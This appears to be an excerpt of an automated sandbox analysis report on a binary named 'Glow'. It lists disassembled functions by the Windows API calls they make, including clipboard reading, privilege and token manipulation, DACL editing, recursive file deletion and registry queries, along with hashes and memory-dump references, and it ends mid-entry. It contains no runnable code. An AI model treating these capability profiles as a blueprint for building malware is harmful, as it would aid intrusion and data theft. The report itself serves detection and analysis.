                                                                                                                                                                          • Instruction ID: 798fe39cd9662bbfad68e938cc6f6f121fdba6248b3f1f4aa7355240fecde94f
                                                                                                                                                                          • Opcode Fuzzy Hash: 7237d6ed0b25e561667b52de49fe3a1ea413953c2ebaaee0473ed0f986f54601
                                                                                                                                                                          • Instruction Fuzzy Hash: F8D06C3204010DBBDF028F84DD06EDA3BAAFB48714F018010BE1856020C732E821AB94
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,003ED840), ref: 003EEAB1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                          • Opcode ID: 24bbec47b9b45890ba7f9e08d86b996fb0e659d8fd8161a71b6c68c0b78120a7
                                                                                                                                                                          • Instruction ID: 75d90cb8048fee8a835634c17739b8449f9c88cd2db81392d63dc35176b4755e
                                                                                                                                                                          • Opcode Fuzzy Hash: 24bbec47b9b45890ba7f9e08d86b996fb0e659d8fd8161a71b6c68c0b78120a7
                                                                                                                                                                          • Instruction Fuzzy Hash: 9BB0926440067005AD294A3D5A09999330078423A57DE1BE8E479850E1C339880FA950
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 003EDC54: FindFirstFileW.KERNEL32(?,?), ref: 003EDCCB
                                                                                                                                                                            • Part of subcall function 003EDC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 003EDD1B
                                                                                                                                                                            • Part of subcall function 003EDC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 003EDD2C
                                                                                                                                                                            • Part of subcall function 003EDC54: FindClose.KERNEL32(00000000), ref: 003EDD43
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 003F666E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2191629493-0
                                                                                                                                                                          • Opcode ID: 512cdcaff2c73cf0a701785291b5b0f63a6e1fbf6849bfedbd9dec1d5b0c7ec1
                                                                                                                                                                          • Instruction ID: 3917112d3a7e984ca90c3e04ee381e20cdda18a8cbc9b231102ebfd91fb07898
                                                                                                                                                                          • Opcode Fuzzy Hash: 512cdcaff2c73cf0a701785291b5b0f63a6e1fbf6849bfedbd9dec1d5b0c7ec1
                                                                                                                                                                          • Instruction Fuzzy Hash: 1AF08C366002149FCB11FF59D845BAEB7E6AF88360F148459F9098B352CB70BC01CB94
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 003E2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003E205A
                                                                                                                                                                            • Part of subcall function 003E2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003E2087
                                                                                                                                                                            • Part of subcall function 003E2010: GetLastError.KERNEL32 ref: 003E2097
                                                                                                                                                                          • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 003E1BD2
                                                                                                                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 003E1BF4
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 003E1C05
                                                                                                                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 003E1C1D
                                                                                                                                                                          • GetProcessWindowStation.USER32 ref: 003E1C36
                                                                                                                                                                          • SetProcessWindowStation.USER32(00000000), ref: 003E1C40
                                                                                                                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 003E1C5C
                                                                                                                                                                            • Part of subcall function 003E1A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003E1B48), ref: 003E1A20
                                                                                                                                                                            • Part of subcall function 003E1A0B: CloseHandle.KERNEL32(?,?,003E1B48), ref: 003E1A35
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                          • String ID: $default$winsta0$jD
                                                                                                                                                                          • API String ID: 22674027-1564320998
                                                                                                                                                                          • Opcode ID: 639415fed9941d800163e7792390cbbbc7dc87cde37393578efd2b52ed821d82
                                                                                                                                                                          • Instruction ID: 072b727a0bbe2a98fcf1cac3f581f6b6f7025b82e01d856bc1ca93a6c43a204b
                                                                                                                                                                          • Opcode Fuzzy Hash: 639415fed9941d800163e7792390cbbbc7dc87cde37393578efd2b52ed821d82
                                                                                                                                                                          • Instruction Fuzzy Hash: 57818BB1900258ABDF129FA5DC49FFF7BB8FF04300F158229F914A62A0D7758955CB64
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 003E1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 003E1A60
                                                                                                                                                                            • Part of subcall function 003E1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,003E14E7,?,?,?), ref: 003E1A6C
                                                                                                                                                                            • Part of subcall function 003E1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,003E14E7,?,?,?), ref: 003E1A7B
                                                                                                                                                                            • Part of subcall function 003E1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,003E14E7,?,?,?), ref: 003E1A82
                                                                                                                                                                            • Part of subcall function 003E1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 003E1A99
                                                                                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 003E1518
                                                                                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 003E154C
                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 003E1563
                                                                                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 003E159D
                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003E15B9
                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 003E15D0
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 003E15D8
                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 003E15DF
                                                                                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 003E1600
                                                                                                                                                                          • CopySid.ADVAPI32(00000000), ref: 003E1607
                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 003E1636
                                                                                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 003E1658
                                                                                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 003E166A
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003E1691
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 003E1698
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003E16A1
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 003E16A8
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003E16B1
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 003E16B8
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 003E16C4
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 003E16CB
                                                                                                                                                                            • Part of subcall function 003E1ADF: GetProcessHeap.KERNEL32(00000008,003E14FD,?,00000000,?,003E14FD,?), ref: 003E1AED
                                                                                                                                                                            • Part of subcall function 003E1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,003E14FD,?), ref: 003E1AF4
                                                                                                                                                                            • Part of subcall function 003E1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,003E14FD,?), ref: 003E1B03
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4175595110-0
                                                                                                                                                                          • Opcode ID: 782b48583cae10e55dfdd5274a6b4891634707b33516fa950d65e42f207c540a
                                                                                                                                                                          • Instruction ID: 86e987bb61d3fd68f40dcb97dcc64cbae99ea770873f133da909c29db6581f5a
                                                                                                                                                                          • Opcode Fuzzy Hash: 782b48583cae10e55dfdd5274a6b4891634707b33516fa950d65e42f207c540a
                                                                                                                                                                          • Instruction Fuzzy Hash: 39715DB2900259ABDF11DFA6DC44FEEBBB8BF08340F098625E915A7190D7719A05CBA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • OpenClipboard.USER32(0041DCD0), ref: 003FF586
                                                                                                                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 003FF594
                                                                                                                                                                          • GetClipboardData.USER32(0000000D), ref: 003FF5A0
                                                                                                                                                                          • CloseClipboard.USER32 ref: 003FF5AC
                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 003FF5E4
                                                                                                                                                                          • CloseClipboard.USER32 ref: 003FF5EE
                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 003FF619
                                                                                                                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 003FF626
                                                                                                                                                                          • GetClipboardData.USER32(00000001), ref: 003FF62E
                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 003FF63F
                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 003FF67F
                                                                                                                                                                          • IsClipboardFormatAvailable.USER32(0000000F), ref: 003FF695
                                                                                                                                                                          • GetClipboardData.USER32(0000000F), ref: 003FF6A1
                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 003FF6B2
                                                                                                                                                                          • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 003FF6D4
                                                                                                                                                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 003FF6F1
                                                                                                                                                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 003FF72F
                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 003FF750
                                                                                                                                                                          • CountClipboardFormats.USER32 ref: 003FF771
                                                                                                                                                                          • CloseClipboard.USER32 ref: 003FF7B6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 420908878-0
                                                                                                                                                                          • Opcode ID: b7652b90de0350ae765bd07d7afd5d55846e3ad72598631cb4fece1b13127d20
                                                                                                                                                                          • Instruction ID: 9c76266003afab949e0b5d0f22110cd9d7522c61e25656f1e33c0fb63f97ac70
                                                                                                                                                                          • Opcode Fuzzy Hash: b7652b90de0350ae765bd07d7afd5d55846e3ad72598631cb4fece1b13127d20
                                                                                                                                                                          • Instruction Fuzzy Hash: 9D61F2712043059FD302FF20D884F7AB7A4AF44744F1485ADF94A8B2A2DB31DD49CB62
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 003F7403
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 003F7457
                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003F7493
                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003F74BA
                                                                                                                                                                            • Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333
                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 003F74F7
                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 003F7524
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                          • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                          • API String ID: 3830820486-3289030164
                                                                                                                                                                          • Opcode ID: c69653317a55cf67b3dd546683df704157cc35779a5527ef378c3511b682ab57
                                                                                                                                                                          • Instruction ID: 3dedfb4fc1295d5d0367341de8cbc94523789e0dfb07b2ccd6bb9fa33fda3b2e
                                                                                                                                                                          • Opcode Fuzzy Hash: c69653317a55cf67b3dd546683df704157cc35779a5527ef378c3511b682ab57
                                                                                                                                                                          • Instruction Fuzzy Hash: F3D16072908344AEC315EF64C881EBBB7ECAF88704F44495DF589DB192EB74DA48C762
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 003FA0A8
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 003FA0E6
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 003FA100
                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 003FA118
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 003FA123
                                                                                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 003FA13F
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003FA18F
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(00447B94), ref: 003FA1AD
                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 003FA1B7
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 003FA1C4
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 003FA1D4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                          • API String ID: 1409584000-438819550
                                                                                                                                                                          • Opcode ID: 9b3d57521bbcd2c157d211880121a2273cdb4bbe79367c4609b0feb43caaae91
                                                                                                                                                                          • Instruction ID: 081fe5b3cfb49981aad6ed6654f9ef5f17f60bf492e09a1352937941ebf708d6
                                                                                                                                                                          • Opcode Fuzzy Hash: 9b3d57521bbcd2c157d211880121a2273cdb4bbe79367c4609b0feb43caaae91
                                                                                                                                                                          • Instruction Fuzzy Hash: 203129B1A0061D6FDB11AFB4DC4AAEE77ACDF05320F1140A1FA19D3090EB74DE45CA69
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 003F4785
                                                                                                                                                                          • _wcslen.LIBCMT ref: 003F47B2
                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 003F47E2
                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 003F4803
                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 003F4813
                                                                                                                                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 003F489A
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 003F48A5
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 003F48B0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                          • String ID: :$\$\??\%s
                                                                                                                                                                          • API String ID: 1149970189-3457252023
                                                                                                                                                                          • Opcode ID: 1ef108c45f54be067150ec719a8d077d3760f0c11d60df007149ce2a88831300
                                                                                                                                                                          • Instruction ID: 7674368ece53eaa3901c75d36f17cb46ec543d8c988085836040899d2cbf66eb
                                                                                                                                                                          • Opcode Fuzzy Hash: 1ef108c45f54be067150ec719a8d077d3760f0c11d60df007149ce2a88831300
                                                                                                                                                                          • Instruction Fuzzy Hash: 8F31C2B190024DABDB229FA0DC49FEB37BCEF89740F1081B6F619D6060EB7497448B24
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 003FA203
                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 003FA25E
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 003FA269
                                                                                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 003FA285
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003FA2D5
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(00447B94), ref: 003FA2F3
                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 003FA2FD
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 003FA30A
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 003FA31A
                                                                                                                                                                            • Part of subcall function 003EE399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003EE3B4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                          • API String ID: 2640511053-438819550
                                                                                                                                                                          • Opcode ID: 7960475b819f47e545563443dae0a5d15758421a8144abc99cddf334ade3acc3
                                                                                                                                                                          • Instruction ID: d2ec804507ecb68c94c5f683d3eed0da36699cacf141ad6e378f97b4ea350eb5
                                                                                                                                                                          • Opcode Fuzzy Hash: 7960475b819f47e545563443dae0a5d15758421a8144abc99cddf334ade3acc3
                                                                                                                                                                          • Instruction Fuzzy Hash: 223179B1A00A1D7ECF12AFA0DC08EEE37ACDF05324F1140A2FA18A3090D735DE85CA59
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0040C10E,?,?), ref: 0040D415
                                                                                                                                                                            • Part of subcall function 0040D3F8: _wcslen.LIBCMT ref: 0040D451
                                                                                                                                                                            • Part of subcall function 0040D3F8: _wcslen.LIBCMT ref: 0040D4C8
                                                                                                                                                                            • Part of subcall function 0040D3F8: _wcslen.LIBCMT ref: 0040D4FE
                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0040C99E
                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0040CA09
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040CA2D
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040CA8C
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0040CB47
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0040CBB4
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0040CC49
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0040CC9A
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0040CD43
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0040CDE2
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040CDEF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3102970594-0
                                                                                                                                                                          • Opcode ID: 6d7331e3c59ce7bf626a093f8c80e7bdd8c5fd79acad50fe870411b3c7e01da5
                                                                                                                                                                          • Instruction ID: ee566a83dd37ba460d1d1f1b52209ca94150b0a4965a2d4fff91d3f5ec131594
                                                                                                                                                                          • Opcode Fuzzy Hash: 6d7331e3c59ce7bf626a093f8c80e7bdd8c5fd79acad50fe870411b3c7e01da5
                                                                                                                                                                          • Instruction Fuzzy Hash: 3B024B70604200EFD715DF24C8D1A2ABBE5EF48308F1885ADE84ADB2A2DB35EC46CB55
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00385851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003855D1,?,?,003C4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00385871
